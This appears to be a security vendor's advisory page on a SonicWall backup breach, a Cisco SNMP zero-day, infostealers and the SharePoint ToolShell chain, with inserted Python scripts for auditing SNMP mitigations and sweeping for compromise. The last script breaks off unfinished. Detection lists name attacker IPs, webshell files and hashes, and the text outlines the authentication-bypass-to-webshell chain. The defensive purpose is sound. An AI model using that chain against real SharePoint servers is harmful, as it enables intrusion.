Blumira Threat Intelligence Hub

    Real-time alerts, CVE analysis, and remediation guidance
    for the modern threat landscape.

    Medium
    October 9, 2025

    MySonicWall Cloud Backup Service Breach Leads to Exposed Configuration Files

    MySonicWall cloud backup service has been breached - any configuration files stored there should be considered compromised

    Quick Summary

    • MySonicWall cloud backup service has been breached - any configuration files stored there should be considered compromised.

    • SonicWall revealed this access was the result of a targeted brute-force attack.

    • Customers storing configuration files in the MySonicWall cloud backup service are urged to follow remediation guidelines.

    • Exposed configuration backup files contain sensitive information that could put organizations at risk.

    • No action required for organizations who are not using the MySonicWall cloud backup service and have no configuration files stored there.

    What Happened

    On September 17, 2025, SonicWall released a knowledge base article detailing the exposure of firewall configuration backup files stored in certain MySonicWall accounts. The initial announcement indicated that fewer than 5% of firewalls were affected, with encrypted credentials and no known data leaks. SonicWall revealed this access was the result of a targeted brute-force attack rather than ransomware activity.

    Following this initial disclosure, SonicWall notified potentially affected customers and provided them with fresh configuration files containing randomized passwords for all local users, reset bindings where TOTP (Time-based One-Time Password) is enabled, and randomized IPSec VPN keys. According to SonicWall, "These configuration changes have been made to update these possibly exposed parameters."

    For customers who preferred not to import the SonicWall-provided preference file, guidance was made available to complete a manual "Essential Credential Reset" through their support documentation.

    An update on October 8, 2025 was provided by SonicWall, stating that they have concluded their investigation and confirmed that an unauthorized party had accessed firewall configuration backup files for all customers who have used SonicWall's cloud backup service.

    What That Means

    The exposed configuration backup files contain sensitive information that could put organizations at risk. These files typically include:

    • Local user credentials (usernames and passwords for firewall access)

    • VPN configurations including IPSec shared keys and authentication settings

    • Network topology information such as IP addressing schemes, subnets, and routing configurations

    • Security policies and firewall rules that define what traffic is allowed or blocked

    • SNMP community strings used for network monitoring

    • Admin access credentials for the firewall management interface

    • SSL VPN settings including authentication methods

    • Email and logging server credentials

    • Third-party service integrations and their associated credentials

    According to SonicWall, "The files contain encrypted credentials and configuration data; while encryption remains in place, possession of these files could increase the risk of targeted attacks." It's unclear exactly what portions of the configuration files are encrypted or how encryption is implemented, but possession of these configuration files significantly increases the risk of targeted attacks. Here's why:


    Offline brute-force attacks: If credentials or other sensitive data are encrypted (rather than the entire file), attackers can attempt to crack those encrypted values offline at their own pace, without triggering account lockouts or detection systems. Weak or default passwords are particularly vulnerable to this approach.


    Configuration intelligence: Even with encryption in place, these files likely contain (or could reveal once decrypted) valuable information about network architecture, security policies, enabled services, and potential vulnerabilities that can be exploited through other means.


    Targeted attack planning: Attackers can study the configurations to identify the best attack vectors, vulnerable services, and security gaps before ever touching the live systems.


    Credential stuffing opportunities: If attackers successfully crack any credentials, they can attempt to use them across multiple systems, especially if organizations reuse passwords.

    How to Identify and What to Do

    How to identify vulnerable devices

    It is important to note that ONLY organizations who use the MySonicWall configuration cloud backup service are affected. Those who have not used this service for configuration file backups are not impacted and no action is required.

    To determine if your organization is impacted, follow the guidance provided in SonicWall's official knowledge base article:

    1. Log in to your MySonicWall.com account and verify if cloud backups exist for your registered firewalls.

      • If cloud backups DO exist, continue reading.

      • If cloud backups DO NOT exist, no action is required.

    2. Check for impacted serial numbers: Navigate to Product Management | Issue List. Affected serial numbers will be flagged with information including:

      • Friendly Name

      • Last Download Date

      • Known Impacted Services

    3. If you have used the Cloud Backup feature but no Serial Numbers are shown: SonicWall will provide additional guidance in the coming days to determine if your backup files were impacted. Check the MySonicWall Cloud Backup File Incident page regularly for updates.

    While SonicWall has explained that only specific serial numbers have been impacted, it is highly recommended to follow their Essential Credential Reset and Remediation playbooks if your organization has any configuration files stored in the MySonicWall configuration cloud backup service.

    What to do

    If Serial Numbers are shown: The listed firewalls are at risk and should immediately follow the containment and remediation guidelines outlined in SonicWall's Essential Credential Reset documentation.

    Prioritization tip: Focus on "Active – High Priority" units first, followed by "Active – Lower Priority" units second.

    Important note: The "Impacted Services" field should be used for general guidance only. While the listed services were identified as being enabled at the time of backup, you should review ALL SERVICES WITH CREDENTIALS THAT WERE ENABLED AT OR BEFORE THE TIME OF BACKUP for each serial number listed.

    Technical containment and mitigation documentation can be found at:

    Use the SonicWall Online Firewall Configuration Analysis Tool to identify services that require remediation and follow the on-screen instructions to proceed. Note that UPE Mode is not supported by this tool.

    Who's Impacted

    This incident affects anyone who uses the MySonicWall.com cloud backup service to back up firewall configurations. Based on SonicWall's October 8th update, any customers storing firewall configuration files using this feature have had their configuration files accessed by unauthorized parties.

    When Will SonicWall Fix It

    Unlike a traditional vulnerability requiring a software patch, this incident involves a compromise of SonicWall's cloud backup service infrastructure. There is no firmware update or patch to apply to your firewalls to "fix" this issue.


    Instead, remediation focuses on rotating all potentially exposed credentials and security parameters for affected customers. SonicWall has provided comprehensive guidance through the following resources:

    Organizations must take action to reset credentials and reconfigure security parameters on their affected firewalls. This is not a "wait for a patch" situation—immediate action is required to mitigate the risk of targeted attacks using the exposed configuration data.

    Critical
    September 26, 2025

    Cisco SNMP Zero-Day Vulnerability: Critical Patch and Mitigations


    CVE-2025-20352: Cisco SNMP Zero-Day - Quick Summary

    • Zero-day vulnerability in Cisco IOS/IOS XE SNMP with active exploitation (CVSS 7.7)
    • Allows denial of service or remote code execution depending on attacker privileges
    • Affects all Cisco IOS/IOS XE devices with SNMP enabled
    • Official patch available, no workarounds, only temporary mitigations

    What Happened

    On September 24th, 2025, Cisco disclosed a critical zero-day vulnerability in Cisco IOS Software and IOS XE Software that is being actively exploited in the wild. The vulnerability, tracked as CVE-2025-20352, affects the Simple Network Management Protocol (SNMP) subsystem, and it allows authenticated attackers to cause denial-of-service (DoS) conditions or perform remote code execution with root privileges.


    This vulnerability is due to a stack overflow condition in the SNMP subsystem of the affected software, which can be exploited by sending specially-crafted SNMP packets to vulnerable devices over IPv4 or IPv6 networks. To cause a DoS, the attacker must have the SNMPv2c or earlier read-only community string or have valid SNMPv3 user credentials. To execute code as the root user, the attacker must have the SNMPv1 or v2c read-only community string or have valid SNMPv3 user credentials and administrative or privilege 15 credentials.


    The vulnerability has been assigned a CVSS score of 7.7 (High severity) and affects a wide range of Cisco network infrastructure devices. Cisco confirmed that the flaw affects a broad range of devices running vulnerable versions of Cisco IOS and IOS XE software, including Meraki MS390 and Cisco Catalyst 9300 Series Switches running Meraki CS 17 and earlier.


    CVE ID: CVE-2025-20352

    CVSS: High - 7.7

    Summary: A vulnerability in the Simple Network Management Protocol (SNMP) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow authenticated attackers to cause denial of service or perform remote code execution as root user.

    Cisco's Product Security Incident Response Team (PSIRT) identified that this vulnerability has been successfully exploited in the wild to compromise local Administrator credentials.

    What That Means

    An authenticated remote attacker can exploit the issue by sending specially crafted SNMP packets over IPv4 or IPv6 to achieve two different outcomes depending on their privilege level:


    Low-privileged attackers with SNMPv2c read-only community strings or valid SNMPv3 credentials can force affected devices to reload, causing a denial of service condition that disrupts network operations.


    High-privileged attackers with administrative credentials can achieve full remote code execution as the root user, potentially gaining complete control over the compromised system. This level of access allows attackers to:

    • Establish persistence on critical network infrastructure
    • Move laterally through the network
    • Access sensitive network traffic and configurations
    • Deploy additional malware or backdoors
    • Disrupt business operations

    The fact that this is a zero-day vulnerability with confirmed active exploitation makes it particularly dangerous.

    How to Identify and What to Do

    How to identify vulnerable devices

    To determine whether your devices are vulnerable, check for SNMP configuration using the CLI commands below.

    For SNMPv1 and v2c, use the following command:

    Router# show running-config | include snmp-server community


    For SNMPv3, use the following command:

    Router# show running-config | include snmp-server group

    Router# show snmp user


    If these commands return output, SNMP is enabled and the device should be considered vulnerable unless the affected OID has been explicitly excluded.

    What to do

    Organizations running vulnerable Cisco IOS or IOS XE devices should patch immediately. Cisco strongly advises upgrading to IOS XE Release 17.15.4a or later to fully remediate the issue and prevent further exposure.

    First and most critical step: Determine whether SNMP needs to be publicly accessible. Exposing SNMP to the internet is against security best practices and is rarely necessary for legitimate business operations. In most cases, SNMP should only be accessible from internal management networks or specific trusted hosts. If public SNMP access is not required, immediately block external access using firewalls or access control lists to significantly reduce your attack surface.


    If immediate patching is not possible, implement the following temporary mitigations:

    • Restrict SNMP access to trusted users and networks only
    • Monitor SNMP activity using the show snmp host command
    • Disable affected OIDs using the snmp-server view command (though this may impact device management operations)

    The official mitigation from Cisco involves creating a view that excludes the vulnerable OID:

    !Standard VIEW and Security Exclusions
    snmp-server view NO_BAD_SNMP iso included
    snmp-server view NO_BAD_SNMP snmpUsmMIB excluded
    snmp-server view NO_BAD_SNMP snmpVacmMIB excluded
    snmp-server view NO_BAD_SNMP snmpCommunityMIB excluded
    !End Standard View

    !Advisory Specific Mappings
    !CISCO-AUTH-FRAMEWORK-MIB
    snmp-server view NO_BAD_SNMP cafSessionMethodsInfoEntry.2.1.111 excluded

    To then apply this configuration to a community string, use the following command:

    snmp-server community mycomm view NO_BAD_SNMP RO


    For SNMPv3, use the following command:

    snmp-server group v3group v3 auth read NO_BAD_SNMP write NO_BAD_SNMP


    Critical: There are no workarounds that address this vulnerability. The mitigations listed above are temporary measures only, and upgrading to fixed software is the only complete solution.
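    To check whether the view-based mitigation above has actually been applied to every SNMP access path on a device, here is an added Python audit script (not Cisco's or Blumira's code). It parses the same snmp-server community, group and view lines the CLI checks return and reports every community string or SNMPv3 group that is not bound to a view excluding the affected OID; the OID label is the one from the mitigation snippet, and the sample config is constructed.

```python
"""Audit a Cisco IOS/IOS XE running-config for SNMP access not covered by the
CVE-2025-20352 view-based mitigation.

Added example, not Cisco's or Blumira's code. It parses the same
`snmp-server community`, `snmp-server group` and `snmp-server view` lines the
`show running-config | include ...` checks return, and lists every community
string or SNMPv3 group that is NOT bound to a view excluding the affected OID.
The OID label comes from the mitigation snippet; the sample config is constructed.
"""
import re

# OID label used in the mitigation snippet (CISCO-AUTH-FRAMEWORK-MIB).
AFFECTED_OID = "cafSessionMethodsInfoEntry.2.1.111"

VIEW_RE = re.compile(r"^snmp-server view (\S+) (\S+) (included|excluded)$", re.I)
COMMUNITY_RE = re.compile(r"^snmp-server community (\S+)(?: view (\S+))?\s*(RO|RW)?", re.I)
GROUP_RE = re.compile(r"^snmp-server group (\S+)(.*)$", re.I)


def parse_snmp(config):
    """Return (views, communities, groups) parsed from running-config text."""
    views = {}        # view name -> [(subtree, "included"|"excluded"), ...]
    communities = []  # (community, view name or None, "RO"|"RW")
    groups = []       # (group name, read view or None, write view or None)
    for raw in config.splitlines():
        line = raw.strip()
        m = VIEW_RE.match(line)
        if m:
            views.setdefault(m.group(1), []).append((m.group(2), m.group(3).lower()))
            continue
        m = COMMUNITY_RE.match(line)
        if m:
            communities.append((m.group(1), m.group(2), (m.group(3) or "RO").upper()))
            continue
        m = GROUP_RE.match(line)
        if m:
            opts = m.group(2).split()
            read = opts[opts.index("read") + 1] if "read" in opts else None
            write = opts[opts.index("write") + 1] if "write" in opts else None
            groups.append((m.group(1), read, write))
    return views, communities, groups


def view_excludes_affected(views, name):
    """True only if view `name` is defined and explicitly excludes AFFECTED_OID."""
    if name is None:
        return False  # no view bound: the default view exposes every OID
    return any(sub == AFFECTED_OID and mode == "excluded"
               for sub, mode in views.get(name, []))


def audit(config):
    """Return (kind, name, detail) for every SNMP access path left unmitigated."""
    views, communities, groups = parse_snmp(config)
    findings = []
    for comm, view, mode in communities:
        if not view_excludes_affected(views, view):
            findings.append(("community", comm, f"{mode}, view={view or 'none'}"))
    for grp, read, write in groups:
        unmitigated = [v for v in (read, write)
                       if v is not None and not view_excludes_affected(views, v)]
        if read is None or unmitigated:  # no read view means the default (full) view
            findings.append(("v3group", grp, f"read={read or 'default'}, write={write or 'none'}"))
    return findings


# Constructed running-config excerpt; not taken from any real device.
SAMPLE_CONFIG = """\
snmp-server view NO_BAD_SNMP iso included
snmp-server view NO_BAD_SNMP snmpUsmMIB excluded
snmp-server view NO_BAD_SNMP snmpVacmMIB excluded
snmp-server view NO_BAD_SNMP snmpCommunityMIB excluded
snmp-server view NO_BAD_SNMP cafSessionMethodsInfoEntry.2.1.111 excluded
snmp-server community mycomm view NO_BAD_SNMP RO
snmp-server community public RO
snmp-server community private RW 10
snmp-server group v3group v3 auth read NO_BAD_SNMP write NO_BAD_SNMP
snmp-server group legacy v3 auth
"""

if __name__ == "__main__":
    for kind, name, detail in audit(SAMPLE_CONFIG):
        print(f"UNMITIGATED {kind} {name}: {detail}")
```

    Remember that a view exclusion is a stopgap: the script confirms the mitigation is bound everywhere, not that the device is patched.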

    Who's Impacted

    According to Cisco's official advisory: "This vulnerability affects all versions of SNMP. All devices that have SNMP enabled and have not explicitly excluded the affected object ID (OID) should be considered vulnerable."

    The following products are confirmed vulnerable:

    • Cisco IOS and IOS XE Software (use Cisco Software Checker to determine which releases are vulnerable)
    • Meraki MS390 switches running Meraki CS 17 and earlier
    • Cisco Catalyst 9300 Series Switches running Meraki CS 17 and earlier

    Cisco has confirmed that this vulnerability does not affect the following Cisco products: IOS XR Software, NX-OS Software.

    When Will Cisco Fix It

    Cisco has released software updates that fully address the RCE vulnerability. The fixed release for most affected devices is Cisco IOS XE Software Release 17.15.4a.

    Organizations can use the Cisco Software Checker to determine which software releases are affected and identify the appropriate fixed version for their specific devices.

    The Blumira Incident Detection Engineering team is actively monitoring this issue and looking for additional detection opportunities based on the tactics, techniques, and procedures associated with CVE-2025-20352 exploitation. We will update our detection capabilities as more information becomes available about attack patterns and indicators of compromise.

    Low
    July 25, 2025

    Why “Silent But Deadly” Infostealers Are Summer’s Hottest Trend

    Understanding the malware that's quietly reshaping the threat landscape, and how to protect yourself

    Security Trends and Info
    Security How-To
    Security Alerts


    Remember when we used to worry about viruses that just crashed your computer? Ahhh, simpler times. Malware used to almost always be loud, destructive, and frankly pretty obvious about what it was doing: monitors would flash to the blue screen of death, files would disappear, or your computer would start playing annoying sounds at random intervals.


    Cybercriminals have become a lot smarter about their business model in the decade since ransomware's growth made malware a top earner. After years of ransomware attacks grabbing headlines, with threats of publicized breaches used to extract double payments from victims, a recent trend shows a more subtle shift. Infostealers, the quiet, efficient threat, climbed into the top spot for most common malware in ANY.RUN's end-of-2024 review, with more than twice as many samples detected as the next most common category (loaders), nearly 5x the frequency of ransomware, and nearly double their own rate from just six months before.


    These attacks are insidious because victims often don't realize they've been compromised until their accounts start getting taken, which could be weeks or months later. Unlike ransomware's dramatic hostage-taking approach or traditional malware's destructive persistence, infostealers work in the shadows — and very quickly. They can slip in, grab everything valuable, and exfiltrate loads of sensitive data in seconds to minutes.


    Ok, the context is admittedly pretty scary, but don’t worry: by the end of this guide, you'll understand exactly how these attacks work, why they've become cybercrime's weapon of choice, and most importantly, how to protect yourself and your network from becoming their next victim. In the second part of this article, we’ll also look at how IT and security teams can further insulate their users against becoming targets.

    What Are Infostealers, Anyway?

    An infostealer is malware designed with one primary goal: quietly extracting valuable information from compromised systems. If ransomware is like a victim having their vital documents held hostage until they empty their wallet, infostealers are more like pickpockets who will empty their pockets and slip away into the crowd before anyone is the wiser.


    More literally, infostealers typically use a toolset of exploitation, exploration, and exfiltration to sniff out any potentially valuable data. Some of their most common targets:

    • Harvesting login credentials from browsers, password managers, and applications

    • Stealing cookies and session tokens to potentially bypass multi-factor authentication

    • Snagging financial details like credit card information or cryptocurrency wallet details

    • Exfiltrating personal information like browsing history, autofill data, and stored documents that may be used to further apply leverage to the target

    • Recording keystrokes to capture passwords and sensitive information as it's typed (this is increasingly less common in favor of direct data targeting, though still included in some packages)

    • Monitoring clipboards to steal cryptocurrency addresses, passwords, and account numbers

    • Taking screenshots at critical moments, like when users enter credentials

    • Scanning file systems for documents, spreadsheets, and other valuable files

    Infostealers are successful because of their modular design, where different components handle different theft missions. Some focus on browser data, others target specific applications, and advanced variants can even introduce secondary malware like remote access trojans or ransomware to set up further attacks.


    The key distinction that makes infostealers so dangerous? Speed and invisibility. Ransomware groups want to make their presence known (after all, victims can't pay a ransom if they don't know they've been compromised!), while infostealers are designed for hit-and-run operations. They get in, grab everything valuable, and get out, often before security systems even notice they were there.

    Nano-History Lesson: From Banking Trojans to Malware-as-a-Service

    Infostealers are currently having their day in the sun, but they’re far from a new tactic. The age of infostealers started with the release of ZeuS in 2006, a banking trojan that aimed to harvest client credentials. Early infostealer threats were relatively specialized, focusing primarily on financial institutions and requiring significant technical expertise to deploy.


    The real turning point came in 2018 when the ZeuS source code leaked: hackers swiftly copied and modified it, creating a wave of new infostealers. This democratization of malware development paved the way for the explosion of variants we see today.


    Perhaps the most significant development in the infostealer landscape (and the malware landscape in general) has been the rise of malware-as-a-service (MaaS) platforms allowing almost anyone to launch these once-elite attacks. Today, anyone can purchase infostealer malware for pricing starting as low as $120 per month, regardless of their technical skill.


    This fundamentally changed the cybercrime ecosystem, because cybercrime is driven by budgets and resource availability, just like any legitimate business. Previously, mounting a sophisticated infostealer campaign required specialized programming skills, infrastructure management, and deep technical knowledge – now, it’s as simple as entering (probably stolen) credit card details. MaaS transformed the threat landscape by providing the same scaling, ease-of-use, and affordability of legitimate cloud services and lowered the barriers to entry:


    Pay-As-You-Grow Crime: Modern infostealer operations work just like legitimate SaaS businesses. Criminals pay monthly fees for access to malware, command-and-control infrastructure, customer support, and regular updates.

    The Swiss security provider Proton mentioned infostealers can be sold for as little as $120 per month.


    Evil Geek Squad: MaaS platforms often include customer service, documentation, and even training materials. Some providers even offer free trial periods and money-back guarantees!


    Mega-Evolution: Because these are ongoing business relationships rather than one-time sales, MaaS providers continuously improve their products. StealC, for example, combines the best features of other top infostealers with an aggressive development cycle, regularly releasing updates and improvements.


    They Can Go Their Own Way: Solo operators and small criminal teams can now launch campaigns that were previously only possible for well-funded criminal organizations. Since the technical complexity has been abstracted away, attackers can focus on targeting and social engineering rather than malware development. This shift has created a perfect storm: more attackers with access to better tools, targeting an increasingly digital world where valuable data is everywhere.

    Where Things Stand in 2025

    Looking at current trends in infostealer strains, RedLine remains the veteran champion. RedLine infected 9.9 million hosts, or 43% of all infostealer infections observed by Flashpoint in 2024. RedLine has held onto a top-three position since 2020, demonstrating impressive staying power in a fickle malware market. LummaC2, first released in 2022, has been making quick gains and recently earned itself a dedicated CISA advisory. RisePro, Meta Stealer, and Vidar round out the top tier, but all four still came to less than the total of RedLine!

    What It Means For Individuals

    When infostealers compromise personal devices, the consequences can be life-altering. Victims often don't realize the extent of the breach until accounts start getting taken over, credit cards show unauthorized charges, or they receive notifications about data being sold on dark web markets.

    The stolen data doesn't just disappear; it becomes part of a criminal economy. Personal information gets packaged into "stealer logs" and sold to other criminals who specialize in different types of fraud.

    What It Means For Organizations

    The business impact is even more severe. Notably, 46% of these were non-managed devices hosting both personal and business credentials, often linked to Bring Your Own Device (BYOD) policies. When employees' personal devices get infected, corporate credentials often get swept up in the data theft. Not to mention password re-use, where exposure of someone's personal passwords might also expose their work data if they have used the same password elsewhere. While solo operators and small teams make up the bulk of attacks, there's still more than enough room for big players to go after high-value targets: just this month, a coordinated campaign by law enforcement in 26 countries resulted in taking down more than 20,000 malicious IPs used by one operation.

    How to Stay Safe

    The good news is that while infostealers are sophisticated, they're not unstoppable. With the right habits and tools, you can make yourself a much harder target. Now that you understand the threat, let's talk 3 basic steps (plus one important extra credit assignment) you can take today to protect yourself:

    Password Hygiene: Your First Line of Defense

    Strong, unique passwords are vital to good security, and trusted password managers can be a great asset in creating them, but storing passwords directly in browsers can make them vulnerable to infostealer attacks. Instead of browser credential storage, which can usually be extracted with relative ease, use a dedicated secure password manager like 1Password, Bitwarden, or KeePass that stores data in encrypted vaults. Along with storing all your existing credentials, a password manager helps you:

    • Generate unique passwords for every single account, no exceptions! Password managers can effectively make this an automatic process, suggesting strong passwords whenever a new password/confirmation field set appears.

    • Enable two-factor authentication on your password manager itself as well as on sites that support it. Also consider upgrading to passkeys on sites that support them, which rely on stronger authentication than password-based systems. While passkeys are often tied to devices like your phone or laptop, some password managers will also store passkeys, allowing access across devices while using the stronger authentication option.

    • Regularly audit your stored passwords for weak, old, or duplicate entries. This can be a tedious manual process, but once again, many password managers have built-in tools to make it easier (noticing a theme?).

    Browser Security: Don’t Just Let the Data Faucet Leak

    Remember earlier in the article when I said “stealing cookies and session tokens to potentially bypass multi-factor authentication” was one target infostealers go after? Yeah, about that… You can reduce the risk of session theft by setting your browser to clear cookies and browsing data automatically when you close it, and by logging out of important accounts rather than relying on "remember me" features. Other good hygiene measures: disable automatic downloads and require confirmation each time, and take the time to pause before clicking “OK” on browser permission requests, since malicious browser extensions are a common attack vector. So are zombie extensions: once-legitimate but abandoned tools that leave behind an installed user base ripe for targeting. Remove extensions you no longer actively use, and make sure you’re installing security updates as soon as they’re available.


    (Oh, and avoid pirated content: maybe you wouldn’t download a car, but the chances of accidentally downloading an infostealer along with the latest cracked DLC are much higher.)

    Too Many Phishes In The Sea

    One common trait across all malware variants is needing some way to get onto the target device, or at least deliver a script that will quietly assemble the malware itself – like an assassin mailing themselves the parts for their weapon to assemble on-site. Email remains a primary attack vector, so developing good email habits is essential. Pay extra attention to any unusually urgent requests, unexpected attachments, or links that show a different URL than the supposed sender when hovering over them. Remember, if you’re ever in doubt whether an email from a vendor or contact is legitimate, taking the time to double check through a different channel will end up saving you a lot of time remediating later. And if you do get a suspicious email, be a good neighbor and let your IT/security team know: if you’ve been targeted, there’s a chance your colleagues may be as well!

    What to Do If You Think You're Infected

    Having a plan for preventing being a target is good, but as we know no amount of preparation can make you immune to risk, so having a plan for what you might do if you ARE targeted is better. Here’s some good places to start:

    1. Stop the bleeding and disconnect from the internet immediately to prevent further data theft

    2. Change passwords for all important accounts from a different, clean device (if you’re using a password manager, you can even flag your important accounts in a category to keep track of them!)

    3. Check your financial accounts for unauthorized transactions, as well as whether your providers support any additional security measures to verify your identity

    4. Enable account monitoring and strongly consider freezing your credit with credit bureaus – something I encourage everyone to do anyway!

    5. Keep records of your efforts and consider filing a police report – this will likely be necessary if you need to dispute charges or make an insurance claim

    Remember: Acting quickly can minimize the damage. The longer an infostealer has access to your system, the more data it can steal.

    Moving Forward: Where Do We Go From Here?

    Understanding infostealers is just the first step. These threats are real, they're growing, and they're targeting everyone, not just big corporations or high-value individuals. But you're not powerless against them, and knowing is half the battle to keeping yourself safe.


    The habits we've discussed, like using password managers, securing your browser, being cautious with emails and downloads, are useful for deterring potential infostealer attacks. And these habits will pay dividends, as they are also good practices to protect against most other malware attack methods, too.


    In our next article on infostealers, we'll dive deep into how organizations can build comprehensive defenses against infostealers to protect their teams, covering everything from endpoint protection to threat intelligence integration and behavior-based detections. But the individual protections we've covered here form the crucial foundation that makes all other security measures more effective, and can help anyone whether they’re at home or the office.


    Like that other kind of “silent but deadly” threat, infostealers can make life distinctly unpleasant and they're not going away anytime soon. But with awareness, good habits, and the right tools, you can make sure they don't get their hands on your valuable data. Stay vigilant, stay updated, and until next time – stay safe out there!

    Critical
    July 24, 2025

    CVE-2025-53770: Microsoft SharePoint Vulnerability

    Update 07/29/25 - added information on new detection specific to identifying newly created aspx files in layouts directory.

    Microsoft Security
    CVE


    What Happened

    On July 19th, 2025, Microsoft acknowledged a new, critical vulnerability in Microsoft SharePoint Server 2016, 2019, and Subscription Edition that allows an unauthorized attacker to execute code. The root cause of this vulnerability, identified as CVE-2025-53770, has been associated with a deserialization-style attack where untrusted data sent to an on-premises (on-prem) Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. This vulnerability has been observed being paired with another, CVE-2025-53771, allowing attackers access to restricted directories via path traversal exploitation.


    Due to several factors such as low attack complexity, no privileges or user interaction required, and a network-based attack vector, CVE-2025-53770 has been assigned a 9.8 (critical) CVSS score. The secondary chained vulnerability, CVE-2025-53771 has been assigned a 6.5 (medium) CVSS score.


    Proof-of-concept exploits for CVE-2025-53770 and CVE-2025-53771 are available, and active exploitation in the wild has been observed by several vendors. Colloquially dubbed “ToolShell” by the security community, this exploit chains both CVE-2025-53770 and CVE-2025-53771. The chain allows a remote attacker to bypass authentication by sending a specially crafted HTTP request to ToolPane.aspx with a Referer header set to SignOut.aspx. Following the authentication bypass, a malicious .aspx file is uploaded to the SharePoint directory /LAYOUTS/15/. The dropped file acts as a webshell, providing the attacker with an interactive command shell from which to issue further commands.


    Additionally, some reference has been made to CVE-2025-49704 and CVE-2025-49706. These are references to previous versions of the newly-announced vulnerabilities. In this case, Microsoft has previously attempted to patch against these exploits, but workarounds have been identified, resulting in the new CVE assignments.

    What That Means

    A possible scenario for exploitation would look something like this:

    • Global, internet-wide scans for publicly accessible SharePoint identify a vulnerable server.
    • Attackers are alerted to its presence and begin attempting exploitation with PoC code.
    • Authentication is bypassed, a malicious webshell is dropped, and the attacker gains access to begin their reconnaissance, lateral movement, and persistence tactics.

    In many cases, the internet-wide scanning for vulnerable versions and exploitation steps are automated and provide attackers even faster access.


    There is a high level of concern for this vulnerability, in particular amongst the security community, simply due to the ease of exploitation and the publicly available proof-of-concept code. By default, Microsoft SharePoint Server 2016, 2019, and Subscription Edition are not configured to be publicly accessible, but they can be manually configured this way, intentionally or otherwise.

    How to Identify and What to Do

    For clarity, this vulnerability ONLY affects on-prem versions of Microsoft SharePoint Server. Microsoft confirmed that SharePoint Online in Microsoft 365 is not impacted.

    For affected versions of SharePoint, this is a critical-priority vulnerability that should be patched as soon as possible. If your organization is running a vulnerable version of on-prem SharePoint, you should strongly consider out-of-band patching to address the ToolShell exploit.

    How to Identify

    Given the low complexity of exploitation and the notoriety this vulnerability has attracted, if you are running a vulnerable version of on-prem SharePoint you should check for the following Indicators of Compromise:

    • Unusual/Unexpected files in C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\xxx.aspx
      • spinstall0.aspx
        • SHA-1 f5b60a8ead96703080e73a1f79c3e70ff44df271
        • SHA-1 c06ffcd6b18b1dca51b58d07da1dc89605e31de3
      • xxx.aspx
        • SHA-1 fe3a3042890c1f11361368aeb2cc12647a6fdae1
      • App_Web_spinstall0.aspx.9c9699a8.avz5nq6f.dll
        • SHA-1 76746b48a78a3828b64924f4aedca2e4c49b6735
      • test.txt
        • SHA-1 950aa10a81ba10b955c67be49af80e91190a9231
      • qlj22mpc.dll
        • SHA-1 7f21382d6f09cb2336255b9484013c756a7d9282
    • Network Connections to or from known attacker IPs
      • 96.9.125[.]147
      • 107.191.58[.]76
      • 104.238.159[.]149

    If you suspect or can confirm your server has been compromised, you must also rotate your ASP.NET machine keys. These keys have been targeted and stolen in several confirmed incidents. Failure to rotate them may allow an attacker to forge authentication tokens and re-compromise the host, even after patching and account resets.
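    A defender-side sweep for the indicators listed above, added here as an example (it is not Blumira's or Microsoft's code). The SHA-1 hashes, file names, attacker IPs and the default LAYOUTS path are taken from the list above; the throwaway directory, the extra benign file names and the firewall log lines are constructed so the script runs offline. Modification time stands in for creation time so the script behaves the same on every platform, and because timestamps can be altered, the hash and name rules are independent of it.

```python
"""Sweep a SharePoint LAYOUTS directory and a connection log for the
ToolShell indicators listed in the advisory above.

Added example (not Blumira's or Microsoft's code). Hashes, file names
and IPs come from the advisory; the demo directory and log lines are
constructed so the script runs offline.
"""
import hashlib
import os
import re
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path

# SHA-1 indicators from the advisory, mapped to the file name they were seen under.
KNOWN_BAD_SHA1 = {
    "f5b60a8ead96703080e73a1f79c3e70ff44df271": "spinstall0.aspx",
    "c06ffcd6b18b1dca51b58d07da1dc89605e31de3": "spinstall0.aspx",
    "fe3a3042890c1f11361368aeb2cc12647a6fdae1": "xxx.aspx",
    "76746b48a78a3828b64924f4aedca2e4c49b6735": "App_Web_spinstall0.aspx.9c9699a8.avz5nq6f.dll",
    "950aa10a81ba10b955c67be49af80e91190a9231": "test.txt",
    "7f21382d6f09cb2336255b9484013c756a7d9282": "qlj22mpc.dll",
}
KNOWN_BAD_NAMES = {name.lower() for name in KNOWN_BAD_SHA1.values()}

# Attacker IPs from the advisory, written de-fanged as published.
KNOWN_BAD_IPS_DEFANGED = ["96.9.125[.]147", "107.191.58[.]76", "104.238.159[.]149"]


def refang(ip: str) -> str:
    """Convert the '[.]' notation used in the advisory back to a dotted address."""
    return ip.replace("[.]", ".")


KNOWN_BAD_IPS = {refang(ip) for ip in KNOWN_BAD_IPS_DEFANGED}

# Default LAYOUTS path for SharePoint 2016/2019/SE, as given in the advisory.
DEFAULT_LAYOUTS = Path(r"C:\Program Files\Common Files\Microsoft Shared"
                       r"\Web Server Extensions\16\TEMPLATE\LAYOUTS")


def sha1_of(path: Path) -> str:
    h = hashlib.sha1()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep_layouts(layouts: Path = DEFAULT_LAYOUTS, recent_days: int = 14) -> list:
    """Return findings for files that match a known-bad hash or name, or are
    .aspx files written recently. Modification time is used as a portable
    proxy for creation time; it can be tampered with, so the hash and name
    rules are deliberately independent of it."""
    cutoff = datetime.now(timezone.utc) - timedelta(days=recent_days)
    findings = []
    for p in sorted(layouts.iterdir()):
        if not p.is_file():
            continue
        digest = sha1_of(p)
        reasons = []
        if digest in KNOWN_BAD_SHA1:
            reasons.append("hash matches IoC for " + KNOWN_BAD_SHA1[digest])
        if p.name.lower() in KNOWN_BAD_NAMES:
            reasons.append("file name matches IoC")
        modified = datetime.fromtimestamp(p.stat().st_mtime, tz=timezone.utc)
        if p.suffix.lower() == ".aspx" and modified >= cutoff:
            reasons.append("recently written .aspx in LAYOUTS")
        if reasons:
            findings.append({"path": str(p), "sha1": digest, "reasons": reasons})
    return findings


IP_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def scan_connection_log(lines) -> list:
    """Return the log lines that mention any of the advisory's attacker IPs."""
    return [line for line in lines
            if any(ip in KNOWN_BAD_IPS for ip in IP_RE.findall(line))]


# Constructed firewall log lines (203.0.113.0/24 and 10.0.0.0/8 are placeholders).
SAMPLE_LOG = [
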